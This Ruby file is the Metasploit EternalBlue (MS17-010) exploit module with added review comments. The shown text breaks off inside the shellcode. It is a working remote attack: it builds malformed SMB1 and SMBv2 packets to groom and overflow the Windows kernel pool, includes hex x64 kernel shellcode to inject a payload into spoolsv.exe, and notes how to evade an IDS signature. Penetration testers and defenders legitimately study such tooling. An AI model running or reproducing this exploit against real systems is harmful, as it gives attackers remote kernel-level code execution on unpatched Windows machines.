  1. # This module is a work in progress, but should work for Windows 7 and Server 2008 x64.
  2.  
  3. ##
  4. # exploit/windows/smb/ms17_010_eternalblue
  5. #
# This module is a standalone version; eventually the x64 ring-0 payload and
# certain packets will live in separate files in the Metasploit master branch.
  8. ##
  9.  
  10. ##
  11. # This module requires Metasploit: http://metasploit.com/download
  12. # Current source: https://github.com/rapid7/metasploit-framework
  13. ##
  14.  
  15. require 'ruby_smb'
  16. require 'ruby_smb/smb1/packet'
  17.  
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata, target description and user-facing options.
  #
  # NOTE(review): the per-target offsets declared under 'Targets' (ep_thl_b,
  # et_alertable, teb_acp, et_tle) are not read anywhere in this version of the
  # module: smb_eternalblue calls make_kernel_user_payload with literal zeros and
  # that method ignores every argument except ring3. They appear to be reserved
  # for the planned non-standalone layout described in the file header.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
      'Description' => %q{
This module is a port of the Equation Group ETERNALBLUE exploit, part of
the FuzzBunch toolkit released by Shadow Brokers.

There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
completed in srvnet!SrvNetWskReceiveComplete.

This exploit, like the original may not trigger 100% of the time, and should be
run continuously until triggered. It seems like the pool will get hot streaks
and need a cool down period before the shells rain in again.
},

      'Author' => [
        'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
        'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
        'Equation Group',
        'Shadow Brokers'
      ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'MSB', 'MS17-010' ],
          [ 'CVE', '2017-0143' ],
          [ 'CVE', '2017-0144' ],
          [ 'CVE', '2017-0145' ],
          [ 'CVE', '2017-0146' ],
          [ 'CVE', '2017-0147' ],
          [ 'CVE', '2017-0148' ],
          [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged' => true,
      'Payload' =>
        {
          # Upper bound on the encoded user-mode payload (ring3); see
          # make_smb2_payload_body_packet for the hard limit it must respect.
          'Space' => 2000, # this can be more, needs to be recalculated
          'EncoderType' => Msf::Encoder::Type::Raw,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows 7 and Server 2008 (x64) All Service Packs',
            {
              'Platform' => 'win',
              'Arch' => [ ARCH_X64 ],

              'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
              'et_alertable' => 0x4c, # ETHREAD.Alertable offset
              'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
              'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Mar 14 2017'
    ))

    register_options(
      [
        Opt::RPORT(445),
        OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
        OptInt.new( 'MaxExploitAttempts', [ true, "The number of times to retry the exploit.", 3 ] ),
        OptInt.new( 'GroomAllocations', [ true, "Initial number of times to groom the kernel pool.", 12 ] ),
        OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] )
      ])
  end

  # Vulnerability check. Not implemented yet: the body is empty, so this
  # returns nil rather than a CheckCode. Operators cannot use `check` to
  # confirm patch status with this version; the author's todo below points to
  # the scanner module that is expected to provide it.
  def check
    # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
  end

  # Entry point. Runs smb_eternalblue up to MaxExploitAttempts times, widening
  # the pool groom on every retry, and stops as soon as a session is observed.
  #
  # Groom count for attempt i is GroomAllocations + GroomDelta * (i - 1).
  # After each attempt the method polls session_created? once per second for
  # at most five seconds (see the author's note on why the sleep exists).
  #
  # Error handling: transport errors and unexpected SMB status codes are
  # reported and terminate the retry loop (the rescue sits outside the `for`);
  # any other StandardError is reported together with its backtrace. Nothing
  # is re-raised, so a failed run returns normally. The `ensure` is empty.
  def exploit
    begin
      # NOTE(review): `for` leaks `i` into method scope; harmless here.
      for i in 1..datastore['MaxExploitAttempts']

        grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)

        smb_eternalblue(datastore['ProcessName'], grooms)

        # we don't need this sleep, and need to find a way to remove it
        # problem is session_count won't increment until stage is complete :\
        secs = 0
        while !session_created? and secs < 5
          secs += 1
          sleep 1
        end

        if session_created?
          print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
          print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
          print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
          break
        else
          print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
          print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
          print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
        end
      end

    rescue ::RubySMB::Error::UnexpectedStatusCode,
           ::Errno::ECONNRESET,
           ::Rex::HostUnreachable,
           ::Rex::ConnectionTimeout,
           ::Rex::ConnectionRefused => e
      print_bad("#{e.class}: #{e.message}")
    rescue => error
      # Catches any remaining StandardError; `error.backtrace` is an Array
      # and is handed to print_bad as-is.
      print_bad(error.class)
      print_bad(error.message)
      print_bad(error.backtrace)
    ensure
      # pass
    end
  end

  #
  # Increase the default delay by five seconds since some kernel-mode
  # payloads may not run immediately.
  #
  def wfs_delay
    super + 5
  end

  # One full exploitation attempt against the target.
  #
  # process_name - currently unused beyond being forwarded nowhere; the
  #                user-mode payload is built with make_kernel_user_payload,
  #                which ignores its process/offset arguments in this version.
  # grooms       - number of SMBv2 groom connections to open in the first
  #                groom round (a fixed second round of 6 follows).
  #
  # Side effects: resets @groom_socks to a new Array on every call, opens one
  # SMB1 session for the exploit plus two "free hole" SMB1 sessions plus
  # `grooms + 6` raw groom sockets. The `ensure` calls abort_sockets (from the
  # Tcp mixin), which is what tears all of those down, including the corrupted
  # connection the author's trailing comments refer to.
  #
  # Raises: whatever the underlying connect / RubySMB calls raise; the caller
  # (exploit) is responsible for reporting them.
  def smb_eternalblue(process_name, grooms)
    begin
      # Step 0: pre-calculate what we can
      # NOTE(review): process_name and the target offsets are not passed on;
      # literal zeros are used and ignored by make_kernel_user_payload.
      shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)
      payload_hdr_pkt = make_smb2_payload_headers_packet
      payload_body_pkt = make_smb2_payload_body_packet(shellcode)

      # Step 1: Connect to IPC$ share
      print_status("Connecting to target for exploitation.")
      client, tree, sock = smb1_anonymous_connect_ipc()
      print_good("Connection established for exploitation.")

      print_status("Trying exploit with #{grooms} Groom Allocations.")

      # Step 2: Create a large SMB1 buffer
      print_status("Sending all but last fragment of exploit packet")
      smb1_large_buffer(client, tree, sock)

      # Step 3: Groom the pool with payload packets, and open/close SMB1 packets
      print_status("Starting non-paged pool grooming")

      # initialize_groom_threads(ip, port, payload, grooms)
      fhs_sock = smb1_free_hole(true)

      # Fresh list per attempt; smb2_grooms appends to it and Step 4 iterates it.
      @groom_socks = []

      print_good("Sending SMBv2 buffers")
      smb2_grooms(grooms, payload_hdr_pkt)

      fhf_sock = smb1_free_hole(false)

      print_good("Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.")
      fhs_sock.shutdown()

      print_status("Sending final SMBv2 buffers.") # 6x
      smb2_grooms(6, payload_hdr_pkt) # todo: magic #

      fhf_sock.shutdown()

      print_status("Sending last fragment of exploit packet!")
      # timeout argument 15 is the largest value make_smb1_trans2_exploit_packet
      # can encode (see that method).
      final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)
      sock.put(final_exploit_pkt)

      print_status("Receiving response from exploit packet")
      code, raw = smb1_get_response(sock)

      # Only a success message is printed; any other status falls through
      # silently and the method still proceeds to Step 4.
      if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)
        print_good("ETERNALBLUE overwrite completed successfully (0xC000000D)!")
      end

      # Step 4: Send the payload
      print_status("Sending egg to corrupted connection.")

      # The body packet is written to every groom socket in two slices:
      # bytes [0, 2920) first, then bytes [2920, 4204 - 0x84].
      @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }
      @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }

      print_status("Triggering free of corrupted buffer.")
      # tree disconnect
      # logoff and x
      # note: these aren't necessary, just close the sockets

    ensure
      abort_sockets
    end
  end

  # Opens `grooms` plain TCP connections (connect(false) - no SSL), records
  # each in @groom_socks, and writes payload_hdr_pkt to it. Expects
  # @groom_socks to have been initialised by the caller.
  def smb2_grooms(grooms, payload_hdr_pkt)
    # groom_id is unused; it is only the iteration index.
    grooms.times do |groom_id|
      gsock = connect(false)
      @groom_socks << gsock
      gsock.put(payload_hdr_pkt)
    end
  end

  # Negotiates SMB1 with RubySMB, performs a hand-built anonymous Session
  # Setup (see make_smb1_anonymous_login_packet), then tree-connects to IPC$.
  #
  # Returns [client, tree, sock]. The `raw` value from smb1_get_response is
  # discarded; only the parsed header's uid is used.
  #
  # Raises RubySMB::Error::UnexpectedStatusCode when the Session Setup
  # response carries a non-zero NT status.
  def smb1_anonymous_connect_ipc()
    sock = connect(false)
    dispatcher = RubySMB::Dispatcher::Socket.new(sock)
    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
    client.negotiate

    pkt = make_smb1_anonymous_login_packet
    sock.put(pkt)

    code, raw, response = smb1_get_response(sock)

    unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS
      raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login"
    end

    client.user_id = response.uid

    tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")

    return client, tree, sock
  end

  # Sends the NT Trans request followed by the Trans2 sequence on `sock`:
  # one :eb_trans2_zero packet, fourteen :eb_trans2_buffer packets (indices
  # 1..14 are used as the timeout argument) and an Echo, all concatenated into
  # a single write. Each of the two reads only drains the response; the first
  # result is assigned to `raw` but never used.
  def smb1_large_buffer(client, tree, sock)
    nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)

    # send NT Trans
    vprint_status("Sending NT Trans Request packet")
    sock.put(nt_trans_pkt)

    vprint_status("Receiving NT Trans packet")
    raw = sock.get_once

    # Initial Trans2 request
    trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)

    # send all but last packet
    for i in 1..14
      trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
    end

    trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)

    vprint_status("Sending malformed Trans2 packets")
    sock.put(trans2_pkt_nulled)

    sock.get_once
  end

  # Opens a new SMB1 connection, negotiates, and sends one of two pre-baked
  # Session Setup variants selected by `start` (they differ in flags2, VC
  # number and trailing bytes). The response is read and discarded.
  #
  # Returns the still-open socket; the caller keeps it and shuts it down
  # later (smb_eternalblue), which is what creates the hole.
  def smb1_free_hole(start)
    sock = connect(false)
    dispatcher = RubySMB::Dispatcher::Socket.new(sock)
    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
    client.negotiate

    # Placeholder; both branches below reassign it.
    pkt = ""

    if start
      vprint_status("Sending start free hole packet.")
      pkt = make_smb1_free_hole_session_packet("\x07\xc0", "\x2d\x01", "\xf0\xff\x00\x00\x00")
    else
      vprint_status("Sending end free hole packet.")
      pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
    end

    #dump_packet(pkt)
    sock.put(pkt)

    vprint_status("Receiving free hole response.")
    sock.get_once

    return sock
  end

  # Reads one response from `sock` and parses the SMB1 header after skipping
  # the 4-byte session header (the same 1-byte type + 3-byte length prefix
  # the packet builders in this file prepend).
  #
  # Returns [nt_status, raw_bytes, parsed_header].
  #
  # NOTE(review): if get_once returns nil (peer closed the connection), the
  # `raw[4..-1]` slice raises NoMethodError; exploit's generic rescue reports it.
  def smb1_get_response(sock)
    raw = sock.get_once
    response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
    code = response.nt_status
    return code, raw, response
  end

  # Builds the fixed 132-byte header written to every groom socket: a session
  # message byte, a 3-byte length, the SMB2 magic and 124 zero bytes.
  def make_smb2_payload_headers_packet
    # don't need a library here, the packet is essentially nonsensical
    pkt = ""
    pkt << "\x00" # session message
    pkt << "\x00\xff\xf7" # size
    pkt << "\xfeSMB" # SMB2
    pkt << "\x00" * 124

    pkt
  end

  # Builds the body written to the groom sockets in Step 4: fixed padding and
  # address fields, then kernel_user_payload, then zero-fill up to
  # pkt_max_payload (3575) bytes of payload area.
  #
  # kernel_user_payload must be at most pkt_max_payload bytes long; a longer
  # input makes the final `"\x00" * (negative)` raise ArgumentError. With
  # the declared Payload Space of 2000 plus the ~1019-byte kernel stub and its
  # 2-byte length prefix this stays under the limit.
  def make_smb2_payload_body_packet(kernel_user_payload)
    # precalculated lengths
    pkt_max_len = 4204
    pkt_setup_len = 497
    pkt_max_payload = pkt_max_len - pkt_setup_len # 3575

    # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode
    pkt = ""

    # padding
    pkt << "\x00" * 0x8
    pkt << "\x03\x00\x00\x00"
    pkt << "\x00" * 0x1c
    pkt << "\x03\x00\x00\x00"
    pkt << "\x00" * 0x74

    # KI_USER_SHARED_DATA addresses
    pkt << "\xb0\x00\xd0\xff\xff\xff\xff\xff" * 2 # x64 address
    pkt << "\x00" * 0x10
    pkt << "\xc0\xf0\xdf\xff" * 2 # x86 address
    pkt << "\x00" * 0xc4

    # payload addresses
    pkt << "\x90\xf1\xdf\xff"
    pkt << "\x00" * 0x4
    pkt << "\xf0\xf1\xdf\xff"
    pkt << "\x00" * 0x40

    pkt << "\xf0\x01\xd0\xff\xff\xff\xff\xff"
    pkt << "\x00" * 0x8
    pkt << "\x00\x02\xd0\xff\xff\xff\xff\xff"
    pkt << "\x00"

    pkt << kernel_user_payload

    # fill out the rest, this can be randomly generated
    pkt << "\x00" * (pkt_max_payload - kernel_user_payload.length)

    pkt
  end

  # Builds an SMB1 Echo request carrying a fixed 12-byte echo payload.
  # tree_id and user_id are packed big-endian 16-bit ("S>").
  def make_smb1_echo_packet(tree_id, user_id)
    pkt = ""
    pkt << "\x00" # type
    pkt << "\x00\x00\x31" # len = 49
    pkt << "\xffSMB" # SMB1
    pkt << "\x2b" # Echo
    pkt << "\x00\x00\x00\x00" # Success
    pkt << "\x18" # flags
    pkt << "\x07\xc0" # flags2
    pkt << "\x00\x00" # PID High
    pkt << "\x00\x00\x00\x00" # Signature1
    pkt << "\x00\x00\x00\x00" # Signature2
    pkt << "\x00\x00" # Reserved
    pkt << [tree_id].pack("S>") # Tree ID
    pkt << "\xff\xfe" # PID
    pkt << [user_id].pack("S>") # UserID
    pkt << "\x40\x00" # MultiplexIDs

    pkt << "\x01" # Word count
    pkt << "\x01\x00" # Echo count
    pkt << "\x0c\x00" # Byte count

    # echo data
    # this is an existing IDS signature, and can be nulled out
    #pkt << "\x4a\x6c\x4a\x6d\x49\x68\x43\x6c\x42\x73\x72\x00"
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"

    pkt
  end

  # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
  #
  # Builds one SMB1 Trans2 request. The common header is shared; the tail
  # depends on `type`:
  #   :eb_trans2_exploit - the final fragment (returns early from the if)
  #   :eb_trans2_zero    - the first fragment
  #   anything else      - treated as :eb_trans2_buffer (4096 x "A")
  #
  # `timeout` is encoded as a single byte (timeout * 0x10) + 3 via Integer#chr,
  # so values above 15 raise RangeError (16 * 0x10 + 3 = 259 > 255). Callers
  # use 0, 1..14 and 15.
  def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
    timeout = (timeout * 0x10) + 3

    pkt = ""
    pkt << "\x00" # Session message
    pkt << "\x00\x10\x35" # length
    pkt << "\xffSMB" # SMB1
    pkt << "\x33" # Trans2 request
    pkt << "\x00\x00\x00\x00" # NT SUCCESS
    pkt << "\x18" # Flags
    pkt << "\x07\xc0" # Flags2
    pkt << "\x00\x00" # PID High
    pkt << "\x00\x00\x00\x00" # Signature1
    pkt << "\x00\x00\x00\x00" # Signature2
    pkt << "\x00\x00" # Reserved
    pkt << [tree_id].pack("S>") # TreeID
    pkt << "\xff\xfe" # PID
    pkt << [user_id].pack("S>") # UserID
    pkt << "\x40\x00" # MultiplexIDs

    pkt << "\x09" # Word Count
    pkt << "\x00\x00" # Total Param Count
    pkt << "\x00\x10" # Total Data Count
    pkt << "\x00\x00" # Max Param Count
    pkt << "\x00\x00" # Max Data Count
    pkt << "\x00" # Max Setup Count
    pkt << "\x00" # Reserved
    pkt << "\x00\x10" # Flags
    pkt << "\x35\x00\xd0" # Timeouts
    pkt << timeout.chr
    pkt << "\x00\x00" # Reserved
    pkt << "\x00\x10" # Parameter Count

    #pkt << "\x74\x70" # Parameter Offset
    #pkt << "\x47\x46" # Data Count
    #pkt << "\x45\x6f" # Data Offset
    #pkt << "\x4c" # Setup Count
    #pkt << "\x4f" # Reserved

    if type == :eb_trans2_exploit
      vprint_status("Making :eb_trans2_exploit packet")

      pkt << "\x41" * 2957

      pkt << "\x80\x00\xa8\x00" # overflow

      pkt << "\x00" * 0x10
      pkt << "\xff\xff"
      pkt << "\x00" * 0x6
      pkt << "\xff\xff"
      pkt << "\x00" * 0x16

      pkt << "\x00\xf1\xdf\xff" # x86 addresses
      pkt << "\x00" * 0x8
      pkt << "\x20\xf0\xdf\xff"

      pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64

      pkt << "\x60\x00\x04\x10"
      pkt << "\x00" * 4

      pkt << "\x80\xef\xdf\xff"

      pkt << "\x00" * 4
      pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
      pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
      pkt << "\x00" * 0x10

      pkt << "\x60\x00\x04\x10"
      pkt << "\x00" * 0xc
      pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
      pkt << "\x00" * 0x8
      pkt << "\x80\x10"
      pkt << "\x00" * 0xe
      pkt << "\x39"
      pkt << "\xbb"

      pkt << "\x41" * 965

      return pkt
    end

    if type == :eb_trans2_zero
      vprint_status("Making :eb_trans2_zero packet")
      pkt << "\x00" * 2055
      pkt << "\x83\xf3"
      pkt << "\x41" * 2039
      #pkt << "\x00" * 4096
    else
      vprint_status("Making :eb_trans2_buffer packet")
      pkt << "\x41" * 4096
    end

    pkt

  end

  # Builds the SMB1 NT Trans request sent first by smb1_large_buffer.
  # Header fields are fixed apart from tree_id / user_id ("S>" packed);
  # the trailing 0x3cd zero bytes follow the author's "undocumented" marker.
  def make_smb1_nt_trans_packet(tree_id, user_id)
    pkt = ""
    pkt << "\x00" # Session message
    pkt << "\x00\x04\x38" # length
    pkt << "\xffSMB" # SMB1
    pkt << "\xa0" # NT Trans
    pkt << "\x00\x00\x00\x00" # NT SUCCESS
    pkt << "\x18" # Flags
    pkt << "\x07\xc0" # Flags2
    pkt << "\x00\x00" # PID High
    pkt << "\x00\x00\x00\x00" # Signature1
    pkt << "\x00\x00\x00\x00" # Signature2
    pkt << "\x00\x00" # Reserved
    pkt << [tree_id].pack("S>") # TreeID
    pkt << "\xff\xfe" # PID
    pkt << [user_id].pack("S>") # UserID
    pkt << "\x40\x00" # MultiplexID

    pkt << "\x14" # Word Count
    pkt << "\x01" # Max Setup Count
    pkt << "\x00\x00" # Reserved
    pkt << "\x1e\x00\x00\x00" # Total Param Count
    pkt << "\xd0\x03\x01\x00" # Total Data Count
    pkt << "\x1e\x00\x00\x00" # Max Param Count
    pkt << "\x00\x00\x00\x00" # Max Data Count
    pkt << "\x1e\x00\x00\x00" # Param Count
    pkt << "\x4b\x00\x00\x00" # Param Offset
    pkt << "\xd0\x03\x00\x00" # Data Count
    pkt << "\x68\x00\x00\x00" # Data Offset
    pkt << "\x01" # Setup Count
    pkt << "\x00\x00" # Function <unknown>
    pkt << "\x00\x00" # Unknown NT transaction (0) setup
    pkt << "\xec\x03" # Byte Count
    pkt << "\x00" * 0x1f # NT Parameters

    # undocumented
    pkt << "\x01"
    pkt << "\x00" * 0x3cd

    pkt
  end

  # Builds a Session Setup AndX request used by smb1_free_hole. The three
  # arguments are spliced in verbatim: flags2 (2 bytes), vcnum (2 bytes) and
  # native_os (the bytes placed where the Native OS field would be, followed
  # by 17 zero bytes). No length checks are performed on them.
  def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
    pkt = ""
    pkt << "\x00" # Session message
    pkt << "\x00\x00\x51" # length
    pkt << "\xffSMB" # SMB1
    pkt << "\x73" # Session Setup AndX
    pkt << "\x00\x00\x00\x00" # NT SUCCESS
    pkt << "\x18" # Flags
    pkt << flags2 # Flags2
    pkt << "\x00\x00" # PID High
    pkt << "\x00\x00\x00\x00" # Signature1
    pkt << "\x00\x00\x00\x00" # Signature2
    pkt << "\x00\x00" # Reserved
    pkt << "\x00\x00" # TreeID
    pkt << "\xff\xfe" # PID
    pkt << "\x00\x00" # UserID
    pkt << "\x40\x00" # MultiplexID
    #pkt << "\x00\x00" # Reserved

    pkt << "\x0c" # Word Count
    pkt << "\xff" # No further commands
    pkt << "\x00" # Reserved
    pkt << "\x00\x00" # AndXOffset
    pkt << "\x04\x11" # Max Buffer
    pkt << "\x0a\x00" # Max Mpx Count
    pkt << vcnum # VC Number
    pkt << "\x00\x00\x00\x00" # Session key
    pkt << "\x00\x00" # Security blob length
    pkt << "\x00\x00\x00\x00" # Reserved
    pkt << "\x00\x00\x00\x80" # Capabilities
    pkt << "\x16\x00" # Byte count
    #pkt << "\xf0" # Security Blob: <MISSING>
    #pkt << "\xff\x00\x00\x00" # Native OS
    #pkt << "\x00\x00" # Native LAN manager
    #pkt << "\x00\x00" # Primary domain
    pkt << native_os
    pkt << "\x00" * 17 # Extra byte params

    pkt
  end

  # Builds an anonymous (empty account/domain, 1-byte ANSI password) SMB1
  # Session Setup AndX request. The two trailing UTF-16LE strings are the
  # Native OS "Windows 2000 2195" and Native LAN Manager "Windows 2000 5.0".
  def make_smb1_anonymous_login_packet
    # Neither Rex nor RubySMB appear to support Anon login?
    pkt = ""
    pkt << "\x00" # Session message
    pkt << "\x00\x00\x88" # length
    pkt << "\xffSMB" # SMB1
    pkt << "\x73" # Session Setup AndX
    pkt << "\x00\x00\x00\x00" # NT SUCCESS
    pkt << "\x18" # Flags
    pkt << "\x07\xc0" # Flags2
    pkt << "\x00\x00" # PID High
    pkt << "\x00\x00\x00\x00" # Signature1
    pkt << "\x00\x00\x00\x00" # Signature2
    pkt << "\x00\x00" # TreeID
    pkt << "\xff\xfe" # PID
    pkt << "\x00\x00" # Reserved
    pkt << "\x00\x00" # UserID
    pkt << "\x40\x00" # MultiplexID

    pkt << "\x0d" # Word Count
    pkt << "\xff" # No further commands
    pkt << "\x00" # Reserved
    pkt << "\x88\x00" # AndXOffset
    pkt << "\x04\x11" # Max Buffer
    pkt << "\x0a\x00" # Max Mpx Count
    pkt << "\x00\x00" # VC Number
    pkt << "\x00\x00\x00\x00" # Session key
    pkt << "\x01\x00" # ANSI pw length
    pkt << "\x00\x00" # Unicode pw length
    pkt << "\x00\x00\x00\x00" # Reserved
    pkt << "\xd4\x00\x00\x00" # Capabilities
    pkt << "\x4b\x00" # Byte count
    pkt << "\x00" # ANSI pw
    pkt << "\x00\x00" # Account name
    pkt << "\x00\x00" # Domain name

    # Windows 2000 2195
    pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
    pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00"
    pkt << "\x00\x00"

    # Windows 2000 5.0
    pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
    pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"

    pkt
  end

  # ring3 = user mode encoded payload
  # proc_name = process to inject APC into
  # ep_thl_b = EPROCESS.ThreadListHead.Blink offset
  # et_alertable = ETHREAD.Alertable offset
  # teb_acp = TEB.ActivationContextPointer offset
  # et_tle = ETHREAD.ThreadListEntry offset
  #
  # Returns the kernel stub from make_kernel_shellcode followed by a 16-bit
  # little-endian ("S<") length of ring3 and ring3 itself.
  #
  # NOTE(review): in this version only `ring3` is used; proc_name and the four
  # offsets are accepted but never read, so the kernel stub's behaviour is
  # fixed regardless of the selected target or ProcessName option.
  # "S<" keeps only the low 16 bits of ring3.length; the Payload Space of
  # 2000 keeps that well in range.
  def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
    sc = make_kernel_shellcode
    sc << [ring3.length].pack("S<")
    sc << ring3
    sc
  end

  # Returns the x64 kernel-mode stub as a byte string. The `+` chain yields a
  # new String on every call, so make_kernel_user_payload may append to it
  # safely. The commented-out leading "\xcc" is a debugging breakpoint.
  def make_kernel_shellcode
    # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm
    # Name: kernel
    # Length: 1019 bytes

    #"\xcc"+
    "\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8\x0F\xD0\xFF\xFF\xFF\xFF" +
    "\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A\x00\x00\x00\x48\x89\xC2" +
    "\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8\x65\x48\x89\x24\x25\x10" +
    "\x00\x00\x00\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x50\x53\x51\x52" +
    "\x56\x57\x55\x41\x50\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41" +
    "\x56\x41\x57\x6A\x2B\x65\xFF\x34\x25\x10\x00\x00\x00\x41\x53\x6A" +
    "\x33\x51\x4C\x89\xD1\x48\x83\xEC\x08\x55\x48\x81\xEC\x58\x01\x00" +
    "\x00\x48\x8D\xAC\x24\x80\x00\x00\x00\x48\x89\x9D\xC0\x00\x00\x00" +
    "\x48\x89\xBD\xC8\x00\x00\x00\x48\x89\xB5\xD0\x00\x00\x00\x48\xA1" +
    "\xF8\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x48\x89\xC2\x48\xC1\xEA\x20\x48" +
    "\x31\xDB\xFF\xCB\x48\x21\xD8\xB9\x82\x00\x00\xC0\x0F\x30\xFB\xE8" +
    "\x38\x00\x00\x00\xFA\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x48\x83" +
    "\xEC\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x41\x5B\x41\x5A\x41\x59" +
    "\x41\x58\x5D\x5F\x5E\x5A\x59\x5B\x58\x65\x48\x8B\x24\x25\x10\x00" +
    "\x00\x00\x0F\x01\xF8\xFF\x24\x25\xF8\x0F\xD0\xFF\x56\x41\x57\x41" +
    "\x56\x41\x55\x41\x54\x53\x55\x48\x89\xE5\x66\x83\xE4\xF0\x48\x83" +
    "\xEC\x20\x4C\x8D\x35\xE3\xFF\xFF\xFF\x65\x4C\x8B\x3C\x25\x38\x00" +
    "\x00\x00\x4D\x8B\x7F\x04\x49\xC1\xEF\x0C\x49\xC1\xE7\x0C\x49\x81" +
    "\xEF\x00\x10\x00\x00\x49\x8B\x37\x66\x81\xFE\x4D\x5A\x75\xEF\x41" +
    "\xBB\x5C\x72\x11\x62\xE8\x18\x02\x00\x00\x48\x89\xC6\x48\x81\xC6" +
    "\x08\x03\x00\x00\x41\xBB\x7A\xBA\xA3\x30\xE8\x03\x02\x00\x00\x48" +
    "\x89\xF1\x48\x39\xF0\x77\x11\x48\x8D\x90\x00\x05\x00\x00\x48\x39" +
    "\xF2\x72\x05\x48\x29\xC6\xEB\x08\x48\x8B\x36\x48\x39\xCE\x75\xE2" +
    "\x49\x89\xF4\x31\xDB\x89\xD9\x83\xC1\x04\x81\xF9\x00\x00\x01\x00" +
    "\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89\xCB\x41\xBB\x66\x55\xA2" +
    "\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB\x49\x8B\x0E\x41\xBB\xA3" +
    "\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89\xC6\xE8\x50\x01\x00\x00" +
    "\x41\x81\xF9\xBF\x77\x1F\xDD\x75\xBC\x49\x8B\x1E\x4D\x8D\x6E\x10" +
    "\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24\x11\xDC\xE8\x81\x01\x00" +
    "\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D\x4E\x08\x49\xC7\x01\x00" +
    "\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31\xC9\x48\x89\x0A\x48\xF7" +
